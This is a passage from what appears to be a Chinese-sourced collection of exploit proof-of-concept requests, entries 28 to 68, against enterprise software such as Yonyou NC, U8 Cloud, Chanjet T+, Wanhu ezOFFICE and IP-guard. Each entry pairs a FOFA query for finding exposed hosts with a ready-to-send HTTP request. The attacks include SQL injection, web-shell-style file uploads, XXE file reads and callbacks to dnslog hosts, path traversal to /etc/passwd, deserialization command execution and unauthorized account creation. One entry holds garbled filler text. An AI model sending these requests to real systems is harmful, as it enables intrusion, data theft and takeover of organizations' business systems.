Accept-Encoding: identity
Connection: close
Content-Type: text/xml; charset=utf-8

28. Yonyou NC grouptemplet arbitrary file upload
FOFA:icon_hash="1085941792"
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Connection: close
Content-Length: 268
Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Accept-Encoding: gzip

------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"
Content-Type: application/octet-stream

<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--

/uapim/static/pages/nc/head.jsp

29. Yonyou NC down/bill SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

30. Yonyou NC importPml SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
Host: your-ip
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Connection: close

------WebKitFormBoundaryH970hbttBhoCyj9V
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"
Content-Type: image/jpeg
------WebKitFormBoundaryH970hbttBhoCyj9V--

31. Yonyou NC runStateServlet SQL injection
version<=6.5
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded

32. Yonyou NC complainbilldetail SQL injection
version: NC633, NC65
FOFA:app="用友-UFIDA-NC"
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

33. Yonyou NC downTax/download SQL injection
version: NC6.5
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

" ~' Z- ?) w1 ]# U9 i0 W34. 用友NC warningDetailInfo接口SQL注入! m4 w* v* Z' h+ {; _5 ~
FOFA:app="用友-UFIDA-NC"' C+ p* N" G$ [; `3 N6 h4 @
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
& e% ?- P3 E6 l4 Y+ |$ j% l. @Host: your-ip/ M* K8 a# [1 d- ?( |- q0 `
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" ~$ V' N/ h/ V* p* E% q: N
Content-Type: application/x-www-form-urlencoded
8 r9 e6 ?# s1 h# c: ~3 c, jAccept-Encoding: gzip, deflate
% k6 ~" _! Y, v- `Accept: */*
# }9 T0 Q* ~8 M6 k$ XConnection: keep-alive
3 O6 [) a/ f3 x/ v; A' W' [
3 |" S" B3 P& q5 S, z# G  K7 C) N5 h' `- T7 G/ [# ]* r7 \
35. Yonyou NC-Cloud importhttpscer arbitrary file upload
FOFA:app="用友-NC-Cloud"
POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
Host: 203.25.218.166:8888
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
Content-Length: 190
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0

--fd28cb44e829ed1c197ec3bc71748df0
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"

<%out.println(1111*1111);%>
--fd28cb44e829ed1c197ec3bc71748df0--

36. Yonyou NC-Cloud soapFormat XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/soapFormat.ajax HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Content-Length: 263
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1

msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a

37. Yonyou NC-Cloud IUpdateService XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Content-Length: 421
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: text/xml;charset=UTF-8
SOAPAction: urn:getResult
Upgrade-Insecure-Requests: 1

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
<soapenv:Header/>
<soapenv:Body>
<iup:getResult>
<!--type: string-->
<iup:string><![CDATA[
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
<xxx/>]]></iup:string>
</iup:getResult>
</soapenv:Body>
</soapenv:Envelope>

38. Yonyou U8 Cloud smartweb2.RPC.d XXE
FOFA:app="用友-U8-Cloud"
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
Host: 192.168.40.131:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
Content-Length: 260
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>

39. Yonyou U8 Cloud RegisterServlet SQL injection
FOFA:title="u8c"
POST /servlet/RegisterServlet HTTP/1.1
Host: 192.168.86.128:8089
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 85
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
X-Forwarded-For: 127.0.0.1
Accept-Encoding: gzip

usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--

40. Yonyou U8-Cloud XChangeServlet XXE
FOFA:app="用友-U8-Cloud"
POST /service/XChangeServlet HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Content-Type: text/xml
Connection: close

<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>

41. Yonyou U8 Cloud MeasureQueryByToolAction SQL injection
FOFA:app="用友-U8-Cloud"
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json
Accept-Encoding: gzip
Connection: close

42. Yonyou GRP-U8 SmartUpload01 file upload
FOFA:app="用友-GRP-U8"
POST /u8qx/SmartUpload01.jsp HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36

PAYLOAD

http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml

43. Yonyou GRP-U8 userInfoWeb SQL injection leading to RCE
FOFA:app="用友-GRP-U8"
POST /services/userInfoWeb HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
SOAPAction:
Content-Type: text/xml;charset=UTF-8

<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
   <soapenv:Header/>
   <soapenv:Body>
      <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
         <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
      </ser:getUserNameById>
   </soapenv:Body>
</soapenv:Envelope>

44. Yonyou GRP-U8 bx_dj_check.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

45. Yonyou GRP-U8 ufgovbank XXE
FOFA:app="用友-GRP-U8"
POST /ufgovbank HTTP/1.1
Host: 192.168.40.130:222
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Connection: close
Content-Length: 161
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

reqData=<?xml version="1.0"?>
<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest

46. Yonyou GRP-U8 sqcxIndex.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

47. Yonyou GRP A++Cloud government finance cloud arbitrary file read
FOFA:body="/pf/portal/login/css/fonts/style.css"
GET /ma/emp/maEmp/download?fileName=../../../etc/passwd HTTP/1.1
Host: x.x.x.x
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
Connection: close

48. Yonyou U8 CRM swfupload arbitrary file upload
FOFA:title="用友U8CRM"
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855

------269520967239406871642430066855
Content-Disposition: form-data; name="file"; filename="s.php"
1231
Content-Type: application/octet-stream
------269520967239406871642430066855
Content-Disposition: form-data; name="upload"
upload
------269520967239406871642430066855--

49. Yonyou U8 CRM uploadfile.php interface arbitrary file upload
FOFA:body="用友U8CRM"

POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Content-Length: 329
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w

-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="file"; filename="%s.php "
Content-Type: application/octet-stream

wersqqmlumloqa
-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="upload"

upload
-----------------------------vvv3wdayqv3yppdxvn3w--

http://x.x.x.x/tmpfile/updB3CB.tmp.php

50. QDocs Smart School 6.4.1 filterRecords SQL injection
FOFA:body="close closebtnmodal"
POST /course/filterRecords/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 224
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1

51. Yunshikong (云时空) social commerce ERP system validateLoginName SQL injection
FOFA:app="云时空社会化商业ERP系统"
GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

52. Weaver E-Office json_common.php SQL injection
FOFA:app="泛微-EOffice"
POST /building/json_common.php HTTP/1.1
Host: 192.168.86.128:8097
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Content-Length: 87
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|3

53. DPTech VPN Service arbitrary file upload
FOFA:app="DPtech-SSLVPN"
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

54. Chanjet T+ getstorewarehousebystore remote code execution
FOFA:app="畅捷通-TPlus"
Step 1: send the request below to the target; it executes a command that writes the given string into the given file:
"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"

Full request:
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
Content-Length: 593

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
      "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
      "StartInfo":{
        "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "FileName":"cmd",
        "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
      }
    }
  }
}

Step 2: request the following URL:
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt

55. Chanjet T+ getdecallusers information disclosure
FOFA:app="畅捷通-TPlus"
Step 1: obtain a Cookie through the interface
/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword
Step 2: using the Cookie obtained, request
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers

56. Chanjet T+ RRATableController,Ufida.T.DI.UIP.ashx deserialization RCE
FOFA: app="畅捷通-TPlus"
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Type: application/json

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
      "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
      "StartInfo": {
        "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"
      }
    }
  }
}

57. Chanjet T+ keyEdit.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

58. Chanjet T+ KeyInfoList.aspx SQL injection
FOFA: app="畅捷通-TPlus"
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

59. XETUX software dynamiccontent.properties.xhtml remote code execution
FOFA: title="@XETUX" && title="XPOS" && body="BackEnd"
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
Host: 192.168.86.128:9090
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Content-Length: 1669
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

PAYLOAD

60. Byzoro Smart management platform importexport.php SQL injection
FOFA: title="Smart管理平台"
GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

61. 浙大恩特 customer resource management system fileupload arbitrary file upload
FOFA: title="欢迎使用浙大恩特客户资源管理系统"
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 27
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

8uxssX66eqrqtKObcVa0kid98xa

62. IP-guard WebServer remote command execution
FOFA: "IP-guard" && icon_hash="2030860561"
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Then access:

GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x

63. IP-guard WebServer arbitrary file read
IP-guard < 4.82.0609.0
FOFA: icon_hash="2030860561"
POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A

64. 捷诚 management information system CWSFinanceCommon SQL injection
FOFA: body="/Scripts/EnjoyMsg.js"
POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
Host: 192.168.86.128:9001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Connection: close
Content-Length: 369
Accept: */*
Accept-Language: en
Content-Type: text/xml; charset=utf-8
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <GetOSpById xmlns="http://tempuri.org/">
      <sId>1';waitfor delay '0:0:5'--+</sId>
    </GetOSpById>
  </soap:Body>
</soap:Envelope>

65. 优卡特 脸爱云 one-face-pass smart management platform 1.0.55.0.0.1 authorization bypass
FOFA: title="欢迎使用脸爱云 一脸通智慧管理平台"
A 200 response means the account test123456/123456 was created successfully.
POST /SystemMng.ashx HTTP/1.1
Host:
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Accept-Language: en
Content-Length: 174

operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators

66. Wanhu ezOFFICE collaborative management platform SendFileCheckTemplateEdit SQL injection
FOFA: app="万户ezOFFICE协同管理平台"
GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

If lines 42 and 43 of the response contain the string 6cfe798ba8e5b85feb50164c59f4bec9, the vulnerability is confirmed.

67. Wanhu ezOFFICE wpsservlet arbitrary file upload
FOFA: app="万户网络-ezOFFICE"
The newdocId and filename parameters set the name of the written file, the dir parameter sets the path it is written to, and the fileType parameter sets the file type.
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Content-Length: 173
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Connection: close
Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
DNT: 1
Upgrade-Insecure-Requests: 1

--ufuadpxathqvxfqnuyuqaozvseiueerp
Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"

<% out.print("sasdfghjkj");%>
--ufuadpxathqvxfqnuyuqaozvseiueerp--

The uploaded file is then reachable at /defaultroot/platform/portal/layout/apoxkq.jsp

68. Wanhu ezOFFICE wf_printnum.jsp SQL injection
FOFA: app="万户ezOFFICE协同管理平台"
GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: {{host}}
